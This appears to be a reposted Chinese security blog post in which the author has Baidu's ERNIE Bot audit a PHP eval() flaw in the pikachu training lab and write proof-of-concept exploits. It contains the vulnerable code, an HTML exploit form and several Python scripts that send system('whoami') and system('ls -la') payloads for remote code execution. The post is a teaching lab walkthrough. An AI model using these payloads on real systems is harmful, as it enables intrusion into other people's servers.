AI代码审计和POC编写

admin 2024年11月17日12:14:39评论17 views字数 2291阅读7分38秒阅读模式

 AI做代码审计和POC编写真好使

AI代码审计和POC编写

看到了,关注一下不吃亏啊,点个赞转发一下啦,WP看不下去的,可以B站搜:标松君,UP主录的打靶视频,欢迎关注。顺便宣传一下星球:重生者安全, 里面每天会不定期更新OSCP知识点,车联网渗透红队以及漏洞挖掘工具等信息分享,欢迎加入;以及想挖SRC逻辑漏洞的朋友,可以私聊。

01

AI代码审计初体验

        在看了很多AI模型对代码审计的能力后,小编也想来体验一下AI做代码审计和POC编写的尝试,所以有了一下小实验:

1.实验目标:通过AI写出一段python编写的POC

2.实验工具:百度文心一言

3.实验靶机:pikachu

02

实验过程

    小编选择了pikachu的RCE漏洞,漏洞代码如下:

路径:C:phpstudy_proWWWpikachuvulrcerce_eval.phpif(isset($_POST['submit']) && $_POST['txt'] != null){    if(@!eval($_POST['txt'])){        $html.="<p>你喜欢的字符还挺奇怪的!</p>";    }}

将代码输入文心一言并附上要求:

AI代码审计和POC编写

下面是AI给出的html版的代码:

<!DOCTYPE html><html><head>    <title>POC: Exploit for eval() vulnerability</title></head><body>    <h1>POC: Exploit for eval() vulnerability</h1>    <form action="http://your-vulnerable-site.com/vulnerable-page.php" method="POST">        <label for="txt">Enter PHP code to execute:</label>        <textarea name="txt" id="txt" rows="10" cols="50"><?php echo phpinfo(); ?></textarea><br><br>        <input type="hidden" name="submit" value="1">        <input type="submit" value="Submit">    </form></body></html>

小编想要的是python版本的,就继续要求它:

AI代码审计和POC编写

代码如下:

import requests# 目标网站的 URLurl = "http://your-vulnerable-site.com/vulnerable-page.php"# 要执行的 PHP 代码(作为字符串发送)malicious_code = "<?php echo 'Vulnerable!'; system('whoami'); ?>"# 构建 POST 数据post_data = {    'txt': malicious_code,    'submit': '1'  # 假设后端检查这个字段来确定是否处理请求}# 发送 POST 请求response = requests.post(url, data=post_data)# 输出响应内容print(response.text)

将代码中的URL地址修改一下,试一试,发现不太行,直接用它的payload放进漏洞的输入框发现是失败的:

AI代码审计和POC编写

我们继续要求:

AI代码审计和POC编写

这回它给出的poc是:

import requests# 目标URL(替换为你的目标URL)target_url = "http://example.com/vulnerable_script.php"# 构造POST数据# 尝试执行一个简单的echo语句post_data = {    'submit': '1',  # 确保submit字段存在    'txt': 'echo "Hello from eval!";'  # 尝试输出字符串}# 发送POST请求response = requests.post(target_url, data=post_data)# 打印响应内容print(response.text)

直接把payload放到输入框,可以正常执行了!

AI代码审计和POC编写

继续给它要求:

就照着'txt': 'echo "Hello from eval!";' 的格式,写一个system函数的poc

AI代码审计和POC编写

POC如下:

import requests# 目标URL(替换为你的目标URL)target_url = "http://example.com/vulnerable_script.php"# 注意:在Windows系统上,应使用'dir'而不是'ls'# 构造POST数据,尝试执行system函数列出当前目录内容# 对于Unix/Linux系统post_data_unix = {    'submit': '1',  # 确保submit字段存在    'txt': 'system("ls -la");'  # 尝试执行ls命令列出目录内容}# 对于Windows系统# post_data_windows = {#     'submit': '1',#     'txt': 'system("dir");'  # 尝试执行dir命令列出目录内容# }# 选择适当的POST数据(根据你的目标系统)post_data = post_data_unix  # 或者 post_data_windows# 发送POST请求response = requests.post(target_url, data=post_data)# 打印响应内容print(response.text)

由于我的是windows部署的靶机,所以出现了下面的结果:

AI代码审计和POC编写

到现在我已经成功的让AI根据一段代码写出了poc!,不得不说AI做代码审计是天然的优势!

原文始发于微信公众号(道玄网安驿站):AI代码审计和POC编写

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年11月17日12:14:39
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   AI代码审计和POC编写https://cn-sec.com/archives/3401367.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息